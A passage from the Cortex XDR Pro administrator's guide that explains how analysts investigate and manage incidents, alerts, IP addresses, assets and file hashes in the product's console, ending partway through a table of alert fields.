STEP 3 | Select an event of interest, and open the Causality View.

Review the chain of execution and data, navigate through the processes on the tree, and analyze the
information.

STEP 4 | Open the Timeline View to view the sequence of events over time.

STEP 5 | Inspect the information again, and identify any characteristics you can use to Create a BIOC
Rule.
If you can create a BIOC rule, test and tune it as needed.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 225

© 2020 Palo Alto Networks, Inc.
Investigate Incidents
An attack event can affect several users or hosts and raise different types of alerts caused by a single event.
You can track incidents, assign analysts to investigate, and document the resolution. For a record log of all
actions taken by analysts in the incident, see Monitor Administrative Activity.
Use the following steps to investigate an incident:

STEP 1 | Navigate to Investigate > Incidents.

STEP 2 | From the Incidents table, locate the incident you want to investigate.
Filter and sort your incidents. Recommended ways include:
• Prioritize incidents according to your incident scoring rules by sorting the Score field to display
incidents with the highest score first.
• In the Status field filter for New incidents to view only the incidents that have not yet been
investigated.
• In the Severity field, identify the incidents with the highest threat impact.
• In the Incident Sources field, filter according to the sources that raised the alerts which make up the
incident.
• In the timestamp fields, such as Last Updated and Creation Time, right-click to Show rows 30 days
prior or 30 days after the selected timestamp field value.
After you locate an incident you want to investigate, right-click it and select View Incident.

The Incident details page aggregates all alerts, insights, and affected assets and artifacts from those
alerts in a single location. From the Incident details page you can manage the alert and investigate an

226 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 event within the context and scope of a threat. Select the pencil icon to edit the incident name and
description.

STEP 3 | Assign an incident to an analyst.

Select the assignee (or Unassigned in the case of a new incident) below the incident description and
begin typing the analyst’s email address for automated suggestions. Users must have logged into the app
to appear in the auto-generated list.

STEP 4 | Assign an incident status.

Select the incident status to update the status from New to Under Investigation, or Resolved to
indicate which incidents have been reviewed and to filter by status in the incidents table.

STEP 5 | Review the details of the incident, such as alerts and insights related to the event, and affected
assets and artifacts.
• Investigate Key Artifacts.
Key Artifacts list files and file hashes, signers, processes, domains, and IP addresses that are related
to the threat event. Each alert type contains certain key artifacts, and the app weighs and sorts alerts
into Incidents based on the key artifacts. Different key artifacts have different weights according to
their impact and case. The app analyzes the alert type, related causality chains, and key artifacts to
determine which incident has the highest correlation with the alert, and the Cortex XDR app groups
the alert with that incident.
The app also displays any available threat intelligence for the artifact. The Threat Intelligence
column in the Key Artifacts panel lists the WildFire (WF) verdicts associated with each artifact and
identifies any malware with a red malware icon. If WildFire flips the file verdict, the hash verdict in
the Cortex XDR incident is updated immediately. If a hash is unknown to WildFire at the time of
incident creation, it remains unknown until WildFire reaches a verdict. Then, the new WildFire verdict
is updated in the incident within 24 hours.If you also integrate additional threat intelligence, this
section can also display VirusTotal (VT) scores and AutoFocus (AF) tags. For additional information,
see External Integrations.
Right-click a file or process under Key Artifacts to view the entire artifact report from the threat
intelligence source.
• View VirusTotal and AutoFocus reports.
•
Add to Allow List. Artifacts added to the allow list are displayed with
•
Add to Block List. Artifacts added to the block list are displayed with
• Open Hash View to display detailed information about the files and processes relating to the hash.
• Open IP Address View to display detailed information about the IP address.
• Investigate Key Assets.
Key Assets identify the scope of endpoints and users affected by the threat. Right-click an asset to
Filter Alerts by that asset and Open Asset View to display the host insights.
• Investigate Alerts.
Incidents are created through high or medium severity alerts. Low severity Analytics alerts sometime
also create an incident. Low and informational severity alerts are categorized as Insights and are
available on the Insights tab. In the incident, review the alerts and, if additional context is required,
review the related insights. You can also view high, medium, and low severity alerts in the main Alerts
table.
During your investigation, you can also perform additional management of alerts, which include:
• Analyze an Alert

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 227

© 2020 Palo Alto Networks, Inc.
 • View the Alert Causality
• Timeline View
• Copy Alerts
• Build an Alert Exclusion Policy from Alerts in an Incident
• Intiate a remediation analysis

STEP 6 | (Optional) Take action on the incident.

• Change the incident severity.
The default severity is based on the highest alert in the incident. To manually change the severity
select Actions > Change Incident Severity and choose the new severity. The smaller severity bubble
indicates the original severity.

• Mange the incident score.

Select Actions > Mange Incident Score to investigate how the Rule based score was calculated.
Listed are the Rule ID, Rule Name, Description, Alert IDs, and the Total Added Score associated with
incident.

The table displays all rules that contributed to the incident total score, including rules that have been
deleted. Deleted scores appear with a N/A. You can override the Rule based score by selecting Set
score manually and Apply the change.
• Change the incident status.
Select Actions > Change Incident Status to update the status from New to Under Investigation.
• Create an exclusion.
Select Actions > Create Exclusion to pivot to the Create New Exclusion page.
• Merge incidents.
To merge incidents you think belong together, select Actions > Merge Incidents. Enter the target
incident ID you want to merge the incident with.
Incident scoring is managed as follows:
• Rule Based Score recalculates the incident score to include the merged incident scores.

228 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 • Manual Score allows to enter a score and override the rule-based score.
Incident assignees are managed as follows:
• If both incidents have been assigned—Merged incident takes the target incident assignee.
• If both incidents are unassigned—Merged incident remains unassigned.
• If the target incident is assigned and the source incident unassigned —Merged incident takes the
target assignee
• If the target incident is unassigned and the source incident is assigned—Merged incident takes the
existing assignee

STEP 7 | Track and share your investigation progress.

Add notes or comments to track your investigative steps and any remedial actions taken.
•
Select the Incident Notepad ( ) to add and edit the incident notes. You can use notes to add code
snippets to the incident or add a general description of the threat.
• Use the comments to coordinate the investigation between analysts and track the progress of the
investigation. Select the comments to view or manage comments.
Collapse the comment threads for an overview of the discussion.
If needed, Search to find specific words or phrases in the comments.

STEP 8 | Resolve the incident.

After the incident is resolved:
1. Set the status to Resolved.
Select the status from the Incident details or select Actions > Change Incident Status.
2. Select the reason the resolution was resolved.

3. Add a comment that explains the reason for closing the incident.
4. Select OK.
The Cortex XDR app no longer adds new alerts to the resolved incident and instead adds incoming
alerts to a new incident.

External Integrations
Cortex XDR supports the following integrations.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 229

© 2020 Palo Alto Networks, Inc.
 Integration Description

Threat Intelligence

WildFire® Cortex XDR automatically includes WildFire threat intelligence

in incident and alert investigation. WildFire detects known and
unknown threats, such as malware. The WildFire verdict contains
detailed insights into the behavior of identified threats. The
WildFire verdict displays next to relevant Key Artifacts in the
incidents details page. See Review WildFire Analysis Details for
more information.

AutoFocus™ AutoFocus groups conditions and indicators related to a threat

with a tag. Tags can be user-defined or come from threat-
research team publications and are divided into classes, such
as exploit, malware family, and malicious behavior. See the
AutoFocus Administrator’s Guide for more information on
AutoFocus tags.
To view AutoFocus tags in Cortex XDR incidents, you must
obtain the license key for the service and add it to the Cortex
XDR Configuration. When you add the service, the relevant tags
display in the incident details page under Key Artifacts.

VirusTotal VirusTotal provides aggregated results from over 70 antivirus

scanners, domain services included in the block list, and user
contributions. The VirusTotal score is represented as a fraction,
where, for example, a score of 34/52 means out of 52 queried
services, 34 services determined the artifact to be malicious.
To view VirusTotal threat intelligence in Cortex XDR incidents,
you must obtain the license key for the service and add it to
the Cortex XDR Configuration. When you add the service, the
relevant VirusTotal (VT) score displays in the incident details
page under Key Artifacts.

Incident Management

Cortex XSOAR Cortex XSOAR enables automated and coordinated threat

response with the ability to adjust and test response playbooks.
When used with Cortex XDR, you can manage incidents from
the Cortex XSOAR interface and leverage the Cortex XDR
Causality Analytics Engine and detection capabilities. Changes to
one app are reflected in the other.

Third-party ticketing systems To manage incidents from the application of your choice, you
can use the Cortex XDR API Reference to send alerts and alert
details to an external receiver. After you generate your API
key and set up the API to query Cortex XDR, external apps can
receive incident updates, request additional data about incidents,
and make changes such as to set the status and change the
severity, or assign an owner. To get started, see the Cortex XDR
API Reference.

230 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
Manage Incident Starring
To help you focus on the incidents that matter most, you can star an incident. Cortex XDR identifies starred
incidents with a purple star. You can star incidents in two ways: You can manually star an incident after
reviewing it, or you can create an incident starring configuration that automatically categorizes and stars
incidents when a related alert contains the specific attributes that you decide are important. After you
define an incident starring configuration, Cortex XDR adds a star indicator to any incidents that contain
alerts that match the configuration.

You can then sort or filter the Incidents table for incidents containing starred alerts and similarly filter
the Alerts table for starred alerts. In addition, you can also choose whether to display all incidents or only
starred incidents on the Incidents Dashboard.

Star a Specific Incident

To manually star an incident during or after investigation:

STEP 1 | Select Investigation > Incidents.

STEP 2 | To open an incident, right-click the incident row and select View Incident.

STEP 3 | Click the star icon.

The star changes to a purple star. After starring the incident, it will appear in filters for starred incidents.
For example, on the Incidents page, you can sort or filter by Starred status.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 231

© 2020 Palo Alto Networks, Inc.
Create a Starring Configuration
To proactively star alerts and incidents containing alerts, create a starring configuration.

STEP 1 | Select Investigation > Incident Management > Starred Alerts.

STEP 2 | + Add Starring Configuration

STEP 3 | Enter a Configuration Name to identify your starring configuration.

STEP 4 | Enter a descriptive Comment that identifies the reason or purpose of the starring
configuration.

STEP 5 | Use the alert filters to build the match criteria for the policy.
You can also right-click a specific value in the alert to add it as match criteria. The app refreshes to show
you which alerts in the incident would be included.

STEP 6 | Create the policy and confirm the action.

If you later need to make changes, you can view, modify, or delete the exclusion policy from the
Investigation > Incident Management > Starred Alerts page.

Create an Incident Scoring Rule

Cortex XDR uses stitching logic to gather and assign alerts to incidents based on a set of rules which
take into account different alert attributes, such SHA256 of files that are involved and IP addresses. The
incidents displayed in the Incidents Table can be prioritized according to these alert attributes.

232 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 To enable you to prioritize incidents that are significant to the needs of your organization, the Incident
Scoring Rules allow you to set custom rules that highlight the incidents based on:
• A user-defined score
• Selected Cortex XDR alert attributes and assets
When an alert is triggered, Cortex XDR matches the alert with each of the custom incident rules you
created. If the alert matches one or more of the rules, the alert is given the score defined by each rule. An
incident rule can also contain a sub-rule that allows you to create a rule hierarchy. Where a sub-rule exists,
if the same alert matches one or more of the sub-rules, the alert is also given the score defined by each sub-
rule. By default, a score is applied only to the first alert that matches the defined rule and sub-rule.

A sub-rule score is only applied to an alert if the top-level rule was a match.

Within each incident, Cortex XDR aggregates the alert scores and assigns the incident a total score. The
incident score is displayed in the Incidents Table as filterable field, Score, allowing you to prioritize the
Incident Table according to the incident score. You can also view the score while investigating in the
Incident View.
To create an incident scoring rule:

STEP 1 | In the Cortex XDR Management Console, navigate to Investigation > Incident Management >
Scoring Rules.
The Scoring Rules table displays the rules and, if applicable, the sub-rules currently in your Cortex XDR
tenant.

STEP 2 | Select Add Scoring Rule to define the rule criteria.

STEP 3 | In the Create New Scoring Rule dialog, define the following:

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 233

© 2020 Palo Alto Networks, Inc.
 1. Rule Name—Enter a unique name for your rule.
2. Score—Set a numeric value that is applied to an alert matching the rule criteria.
3. Base Rule—Select whether to create a top-level rule, Root, or sub-rule, listed Rule Name (ID:#). By
default, rules are defined at root level.
4. Comment—Enter an optional comment.
5. Mark whether to Apply score only to first alert of incident—By selecting this option you choose to
apply the score only to the first alert that matches the defined rule. Subsequent alerts of the same
incident will not receive a score from this rule again. By default, a score is applied only to the first
alert that matches the defined rule and sub-rule.
6. Determine which alert attribute you want to use as the rule match criteria. Use the filter at the top of
the table to build your rule criteria.

STEP 4 | Review the rule criteria and Create the incident rule.
You are automatically redirected to the Scoring Rules table.

STEP 5 | In the Scoring Rules table, Save your scoring rule.

STEP 6 | (Optional) Manage your existing incident scoring rules.

In the Scoring Rules table view your existing rules and sub-rules.
•
Use the to rearrange a rule. Make sure to Save after any changes you make.
• Right-click one rule or select more than one to:
• Edit rule—Edit the rule criteria for an existing rule.
• Delete rule—Remove a rule and the sub-rules from your Cortex XDR tenant.
• Disable / Enable rule—Disables or enables rule. Disabled rules appear in the table but are grayed
out and you cannot perform any actions on them.
• Copy rule—Copy the rule criteria to a clipboard to create a sub-rule. Locate the rule you want add
a sub-rule, right-click and Paste “rule name”.
• Add sub-rule—Add a sub-rule to an existing rule.
Make sure to Save your changes.

STEP 7 | (Optional) Investigate and manage incidents scoring rules from the Incident Table or View.

234 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
Investigate Artifacts and Assets
To streamline the investigation process and reduce the number of steps it takes to investigate and threat
hunt artifacts and assets, Cortex XDR provides dedicated views of information relating to IP address,
Network Assets, and File and Process Hash. Each of the views automatically aggregates and displays a
summary of all the information Cortex XDR and threat intelligence services have regarding a specific artifact
and asset.
• IP Address View
• Asset View
• File and Process Hash View

Investigate an IP Address
The IP Address View provides a powerful way to investigate and take action on IP addresses by
reducing the number of steps it takes to collect, research, and threat hunt related incidents. Cortex XDR
automatically aggregates and displays a summary of all the information Cortex XDR and threat intelligence
services have regarding a specific IP address over a defined 24-hour or 7-day time frame.
To help you determine whether an IP address is malicious, the IP Address View displays an interactive visual
representation of the collected activity for a specific IP address.

To investigate an IP address:

STEP 1 | Open the IP View for an IP address.

You can access the view from every IP address in Cortex XDR console by either right-click > Open
IP View, selecting the IP address or using the default keyboard shortcut Ctrl/CMD+Shift+E
combination, or searching for a specific IP address in the Quick Launcher.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 235

© 2020 Palo Alto Networks, Inc.
 To change the default keyboard shortcut, navigate to > Settings > General > Keyboard Shortcuts.
The shortcut value must be a keyboard letter, A through Z, and cannot be the same as the Quick
Launcher defined shortcut.

STEP 2 | Review the overview for the IP address.

The overview displays network operations, incidents, actions, and threat intelligence information relating
to a specific IP address and provides a summary of the network operations and processes related to the
IP address.
1. Review the auto generated summary of the number of network operations and processes related to
the IP that occurred over the past 7 days.
2. Add an Alias or Comment to the IP address.
3. Review the location of the IP address.
• External—IP address is located outside of your organization. Displays the country flag if the
location information is available.
• Internal—IP address is from within your organization. The XDR Agent icon is displayed if the
corresponding endpoint identified by the IP address has an agent is installed at that point in time.
4. Identify the IOC severity.
The color of the IP address value is color-coded to indicate the IOC severity.
• Low—Blue
• Medium—Yellow
• High—Red
5. Review any available threat intelligence for the IP address.
Depending on the threat intelligence sources that you integrate with Cortex XDR, you can review any
of the following threat intelligence.
• Virus Total score and report

Requires a license key. Navigate to > Settings > Integrations > Threat
Intelligence.
• Whois identification data for the specific IP address.
• IOC Rule, if applicable, including the IOC Severity, Number of hits, and Source.
• EDL IP address if the IP address was added to an EDL.
6. Review any related incidents:
Related Incidents lists the most recent incidents that contain the specific IP address as part of the
incident Key Artifacts according to the Last Updated timestamp. If the IP address belongs to an
endpoint with a Cortex XDR agent installed, the incidents are displayed according to the host name
rather than the IP address. To dive deeper into specific incidents, select the Incident ID. To view all
the related incidents, select View All. Cortex XDR displays Recently Updated Incidents which filters
incidents for those that contain the IP address.

STEP 3 | Filter the IP address information you want to visualize.

Select from the following criteria to refine the scope of your IP address information you want visualized.
Each selection aggregates the displayed data.

Filter Description

Type The type of information you want to display.

236 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
Filter Description
• Host Insights—Pivot to the Asset View of the
host associated with the IP address.
• Network Connections—Display the IP View
of the network connections made with the IP
address.

Primary The main set of values you want to display. The

values depend on the selected Connection Type.
• All Aggregations—Summary of all the related
IP address data.
• Destination/Source Country
• Destination/Source Port
• Destination/Source IP
• Destination/Source Process
• App-ID

Secondary The set of values you want to apply as the

secondary set of aggregations. Must differ than
your Primary selection:
• Destination Country
• Destination/Source Port
• Destination/Source IP
• Destination/Source Process
• App-ID

Node Size The node size to display for the type of values.
• Number of Connections
• Total Traffic
• Total Download
• Total Upload

Showing The number of the Primary and Secondary

aggregated connections.
• Top 5
• Top 3
• Bottom 5
• Bottom 3

Connection Type Type of connection you want to display your

defined set of values.
• Incoming
• Outgoing

Timeframe Time period over which to display your defined

set of values.
• 24 Hours
• 7 Days

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 237

© 2020 Palo Alto Networks, Inc.
 Select to apply your selections and update the information displayed in the visualization pane. If
necessary, Refresh to retrieve data.

STEP 4 | Review the selected data.

• Select each node to additional information.
• Select Recent Outgoing Connections to view the most recent connections made by this IP address.
Search all Outgoing Connections to run a Network Connections query on the all the connections
made by this IP address.

STEP 5 | After reviewing the available information for the IP address, take action if desired:
Depending on the current IOC and EDL status, select Actions to:
• Edit Rule
• Disable Rule
• Delete Rule
• Add to EDL

Investigate an Asset
The Asset View provides a powerful way to investigate assets by reducing the number of steps it takes to
collect and research hosts. Cortex XDR automatically aggregates information on hosts and displays the host
insights and a list of related incidents.

To investigate an asset:

STEP 1 | Open the Asset View for an asset.

You can access the view from:
• A host with Cortex XDR agent installed in Cortex XDR console by right-click > Open Asset View.
• The IP View of an internal IP address with a Cortex XDR Agent by selecting Host Insights from the
navigation bar.
• The Quick Launcher, by searching for a specific Host Name.

238 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
STEP 2 | Review the Asset overview.
The overview displays the host name and any related incidents.
1. Review the Host name.
2. Add an Alias or Comment to the host name.
3. Review any related incidents:
Related Incidents lists the most recent incidents that contain the host as part of the incident Key
Artifacts according to the Last Updated timestamp. If the host belongs to an endpoint with a Cortex
XDR agent installed, the incidents are displayed according to the host name. To dive deeper into
specific incidents, select the Incident ID. To view all the related incidents, select View All.

STEP 3 | Filter the host information you want to display.

Select from the following criteria to refine the scope of the host information you want to display. Each
selection aggregates the displayed data.

Filter Description

Type The type of information you want to display.

• Host Insights—A list of the host artifacts.
• Network Connections—Pivot to the IP view
of the IP addresses associated with the host.

Primary List of host artifacts you want to display.

• Users
• Groups
• Users to Groups
• Services
• Drivers
• Autorun
• System Information
• Shares
• Disks

Compare Compare host insights collected by Cortex XDR

over the last 30 days.

Select to apply your selections and update the information displayed in the visualization pane.

STEP 4 | Review the Host Inventory.

Select Run insights collection to initiate a new collection. The next time the Cortex XDR agent connects,
the insights are collected and displayed.

Investigate a File and Process Hash

The file and process Hash View provides a powerful way to investigate and take action on SHA256 hash
processes and files by reducing the number of steps it takes to collect, research, and threat hunt related
incidents. The Hash View automatically aggregates and displays a summary of all the information Cortex

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 239

© 2020 Palo Alto Networks, Inc.
 XDR and threat intelligence services have regarding a specific SHA256 hash over a defined 24 hour or 7 day
time frame.
The Hash View allows you to drill down on each of the process executions, file operations, incidents,
actions, and threat intelligence reports relating to the hash.

To investigate a file or process hash:

STEP 1 | Open the Hash View for a file or process hash.

You can access the view from every hash value in Cortex XDR console by either right-click > Open
Hash View, selecting the hash and using the keyboard shortcut Ctrl/CMD+Shift+E combination, or
searching for a specific hash in the Quick Launcher.

To change the default keyboard shortcut, navigate to > Settings > General > Keyboard Shortcuts.
The shortcut value must be a keyboard letter, A through Z, and cannot be the same as the Quick
Launcher defined shortcut.

STEP 2 | Review the overview for the hash.

The overview displays host/user, incidents, actions, and threat intelligence information relating to a
specific hash and provides a summary of the files and processes related to the hash.
1. Review the auto generated summary of the number of network operations and processes related to
the hash that occurred over the past 7 days.
2. Review the signature of the hash, if available.
3. Identify the Wildfire verdict.
The color of the hash value is color-coded to indicate the WildFire report verdict:
• Blue—Benign
• Yellow—Grayware
• Red—Malware
• Light gray—Unknown verdict
• Dark gray—The verdict is inconclusive

240 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 4. Add an Alias or Comment to the hash value.
5. Review any available threat intelligence for the hash.
Depending on the threat intelligence sources that you integrate with Cortex XDR, you can review any
of the following threat intelligence.
• Virus Total score and report.

Requires a license key. Navigate to > Settings > Integrations > Threat
Intelligence.
• AutoFocus identification data for the specific hash.
• IOC Rule, if applicable, including the IOC Severity, Number of hits, and Source according to the
color-coded values:
• Low—Blue
• Medium—Yellow
• High—Red
• WildFire analysis report.
6. Review if the hash has been added to:
• Allow List or Block List.
• Quarantined, select the number of endpoints to open the Quarantine Details view.
7. Review any related incidents:
Related Incidents lists the most recent incidents that contain the specific hash as part of the incident
Key Artifacts according to the Last Updated timestamp. To dive deeper into specific incidents, select
the Incident ID. To view all the related incidents, select View All. Cortex XDR displays Recently
Updated Incidents which filters incidents for those that contain the hash.

STEP 3 | Filter the hash information you want to visualize.

Select from the following criteria to refine the scope of your hash information you want visualized. Each
selection aggregates the displayed data.

Filter Description

Event Type The main set of values you want to display. The
values depend on the selected type of process or
file.
• All Aggregations—Summary of all the related
hash data.
• Process Executions
• Process Injections
• File Read
• File Write
• File Delete
• File Rename
• File Create

Primary The set of values you want to apply as the

primary set of aggregations. Values depend on
the selected Event Type.
• Initiating Process

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 241

© 2020 Palo Alto Networks, Inc.
 Filter Description
• Target Process / File

Secondary The set of values you want to apply as the

secondary set of aggregations.
• Host
• User

Showing The number of the Primary and Secondary

aggregated values.
• Top 5
• Top 3
• Bottom 5
• Bottom 3

Timeframe Time period over which to display your defined

set of values.
• 24 Hours
• 7 Days

Select to apply your selections and update the information displayed in the visualization pane. If
necessary, Refresh to retrieve data.

STEP 4 | Review the selected data. For more information, select Recent Process Executions to view the
most recent processes executed by the hash. Search all Process Executions to run a query on
the hash.

STEP 5 | After reviewing the available information for the hash, take action if desired:
• Select File Search to initiate a search for this hash across your network.
• Depending on the current hash status, select Actions to:
• Add the hash to a Allow List.
• Add the hash to a Block List.
• Create an IOC rule.

242 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
Investigate Alerts
• Cortex XDR Alerts
• Triage Alerts
• Manage Alerts
• Alert Exclusions
• Causality View
• Network Causality View
• Timeline View
• Analytics Alert View

Cortex XDR Alerts

The Alerts page displays a table of all alerts in Cortex XDR.

The Alerts page consolidates non-informational alerts from your detection sources to enable you to
efficiently and effectively triage the events you see each day. By analyzing the alert, you can better
understand the cause of what happened and the full story with context to validate whether an alert requires
additional action. Cortex XDR supports saving 2M alerts per 4000 agents or 20 terabytes, half of the alerts
are allocated for informational alerts, and half for severity alerts.
To view detailed information for an alert, you can also view details in the Causality View and Timeline View.
From these views you can also view related informational alerts that are not presented on the Alerts page.
By default, the Alerts page displays the alerts that it received over the last seven days (to modify the time
period, use the page filters). Every 12 hours, Cortex XDR enforces a cleanup policy to remove the oldest
alerts that exceed the maximum alerts limit.
The following table describes both the default fields and additional optional fields that you can add to the
alerts table using the column manager and lists the fields in alphabetical order.

Field Description

Status Indicator ( ) Identifies whether there is enough endpoint data to

analyze an alert.

Check box to select one or more alerts on which to

perform actions. Select multiple alerts to assign all

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 243

© 2020 Palo Alto Networks, Inc.
 Field Description
selected alerts to an analyst, or to change the status
or severity of all selected alerts.

ACTION Action taken by the alert sensor, either Detected

or Prevented with action status displayed in
parenthesis. Options are:
• Detected
• Detected (Allowed The Session)
• Detected (Download)
• Detected (Forward)
• Detected (Post Detected)
• Detected (Prompt Allow)
• Detected (Raised An Alert)
• Detected (Reported)
• Detected (Scanned)
• Detected (Sinkhole)
• Detected (Syncookie Sent)
• Detected (Wildfire Upload Failure)
• Detected (Wildfire Upload Success)
• Detected (Wildfire Upload Skip)
• Detected (XDR Managed Threat Hunting)
• Prevented (Block)
• Prevented (Blocked)
• Prevented (Block-Override)
• Prevented (Blocked The URL)
• Prevented (Blocked The IP)
• Prevented (Continue)
• Prevented (Denied The Session)
• Prevented (Dropped All Packets)
• Prevented (Dropped The Session)
• Prevented (Dropped The Session And Sent a TCP
Reset)
• Prevented (Dropped The Packet)
• Prevented (Override)
• Prevented (Override-Lockout)
• Prevented (Post Detected)
• Prevented (Prompt Block)
• Prevented (Random-Drop)
• Prevented (Silently Dropped The Session With
An ICMP Unreachable Message To The Host Or
Application)
• Prevented (Terminated The Session And Sent a
TCP Reset To Both Sides Of The Connection)
• Prevented (Terminated The Session And Sent a
TCP Reset To The Client)
• Prevented (Terminated The Session And Sent a
TCP Reset To The Server)
• N/A

244 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
Field Description

AGENT OS SUB TYPE The operating system subtype of the agent from
which the alert was triggered.

ALERT ID A unique identifier that Cortex XDR assigns to each

alert.

ALERT NAME Module that triggered the alert. If the alert was
generated by Cortex XDR, the Alert Name will be
the specific Cortex XDR rule that created the alert
(BIOC or IOC rule name). If from an external system,
it will carry the name assigned to it by Cortex XDR.
Alerts that match an alert starring policy also display a
purple star.

For alerts coming from firewalls, if

duplicate alerts with the same name
and host are raised within 24 hours,
they are aggregated and identified by
a +n tag.

Alerts that contain a Featured Alert Field are

displayed with flag.

ALERT SOURCE Source of the alert: BIOC, Analytics BIOC, IOC, XDR
Agent, Firewall, or Analytics.

APP-ID Related App-ID for an alert. App-ID is a traffic

classification system that determines what an
application is irrespective of port, protocol, encryption
(SSH or SSL) or any other evasive tactic used by the
application. When known, you can also pivot to the
Palo Alto Networks Applipedia entry that describes
the detected application.

APP CATEGORY APP-ID category name associated with a firewall alert.

APP SUBCATEGORY APP-ID subcategory name associated with a firewall

alert.

APP TECHNOLOGY APP-ID technology name associated with a firewall

alert.

CATEGORY Alert category based on the alert source. An example

of an XDR Agent alert category is Exploit Modules. An
example of a BIOC alert category is Evasion. If a URL
filtering category is known, this field also displays the
name of the URL filtering category.

CGO CMD Command-line arguments of the Causality Group

Owner.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 245

© 2020 Palo Alto Networks, Inc.
 Field Description

CGO MD5 The MD5 value of the CGO that initiated the alert.

CGO NAME The name of the process that started the causality
chain based on Cortex XDR causality logic.

CGO SHA256 The SHA256 value of the CGO that initiated the alert.

CGO SIGNATURE Signing status of the CGO:

• Unsigned
• Signed
• Invalid Signature
• Unknown

CGO SIGNER The name of the software publishing vendor that

signed the file in the causality chain that led up to the
alert.

CONTAINS FEATURED HOST Displays whether the alert includes a host name that
has been flagged as a Featured Alert Field.

CONTAINS FEATURED USER Displays whether the alert includes a user name that
has been flagged as a Featured Alert Field.

CONATINS FEATURED IP ADDRESS Displays whether the alert includes an IP address

name that has been flagged as a Featured Alert Field.

CID Unique identifier of the causality instance generated

by Cortex XDR.

DESCRIPTION Text summary of the event including the alert source,

alert name, severity, and file path. For alerts triggered
by BIOC and IOC rules, Cortex XDR displays detailed
information about the rule.

DESTINATION ZONE NAME The destination zone of the connection for firewall
alerts.

DNS Query Name The domain name queried in the DNS request.

DOMAIN The domain on which an alert was triggered.

EMAIL RECIPIENT The email recipient value of a firewall alerts triggered

on a the content of a malicious email.

EMAIL SENDER The email sender value of a firewall alerts triggered on

a the content of a malicious email.

EMAIL SUBJECT The email subject value of a firewall alerts triggered

on a the content of a malicious email.

EVENT TYPE The type of event on which the alert was triggered:

246 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
Field Description
• File Event
• Injection Event
• Load Image Event
• Network Event
• Process Execution
• Registry Event

EXCLUDED Whether the alert is excluded by an exclusion

configuration.

EXTERNAL ID The alert ID as recorded in the detector from which

this alert was sent.

FILE PATH When the alert triggered on a file (the Event Type is
File) this is the path to the file on the endpoint. If not,
then N/A.

FILE MACRO SHA256 SHA256 hash value of an Microsoft Office file macro

FILE MD5 MD5 hash value of the file.

FILE SHA256 SHA256 hash value of the file.

FW NAME Name of firewall on which a firewall alert was raised.

FW RULE ID The firewall rule ID that triggered the firewall alert.

FW RULE NAME The firewall rule name that matches the network
traffic that triggered the firewall alert.

FW SERIAL NUMBER The serial number of the firewall that raised the
firewall alert.

HOST The hostname of the endpoint or server on which this

alert triggered. The hostname is generally available
for XDR agent alerts or alerts that are stitched with
EDR data. When the hostname is unknown, this field
is blank.

HOST FQDN The fully qualified domain name (FQDN) of the

Windows endpoint or server on which this alert
triggered.

HOST IP IP address of the endpoint or server on which this

alert triggered.

HOST MAC ADDRESS MAC address of the endpoint or server on which this
alert triggered.

HOST OS Operating system of the endpoint or server on which

this alert triggered.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 247

© 2020 Palo Alto Networks, Inc.
 Field Description

INCIDENT ID The ID of the any incident that includes the alert.

INITIATED BY The name of the process that initiated an activity such

as a network connection or registry change.

INITIATOR MD5 The MD5 value of the process which initiated the
alert.

INITIATOR SHA256 The SHA256 hash value of the initiator.

INITIATOR CMD Command-line used to initiate the process including

any arguments.

INITIATOR SIGNATURE Signing status of the process that initiated the

activity:
• Unsigned
• Signed
• Invalid Signature
• Unknown

INITIATOR PATH Path of the initiating process.

INITIATOR PID Process ID (PID) of the initiating process.

INITIATOR SIGNER Signer of the process that triggered the alert.

INITIATOR TID Thread ID (TID) of the initiating process.

IS PHISHING Indicates whether a firewall alert is classified as

phishing.

LOCAL IP If the alert triggered on network activity (the Event

Type is Network Connection) this is the IP address of
the host that triggered the alert. If not, then N/A.

LOCAL PORT If the alert triggered on network activity (the Event

Type is Network Connection) this is the port on the
endpoint that triggered the alert. If not, then N/A.

MAC ADDRESS The MAC address on which the alert was triggered.

MISC Miscellaneous information about the alert.

MITRE ATT&CK TACTIC Displays the type of MITRE ATT&CK tactic on which
the alert was triggered.

MITRE ATT&CK TECHNIQUE Displays the type of MITRE ATT&CK technique and
sub-technique on which the alert was triggered.

MODULE For XDR Agent alerts, this field identifies the

protection module that triggered the alert.

248 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
Field Description

NGFW VSYS NAME Name of the virtual system for the Palo Alto
Networks firewall that triggered an alert.

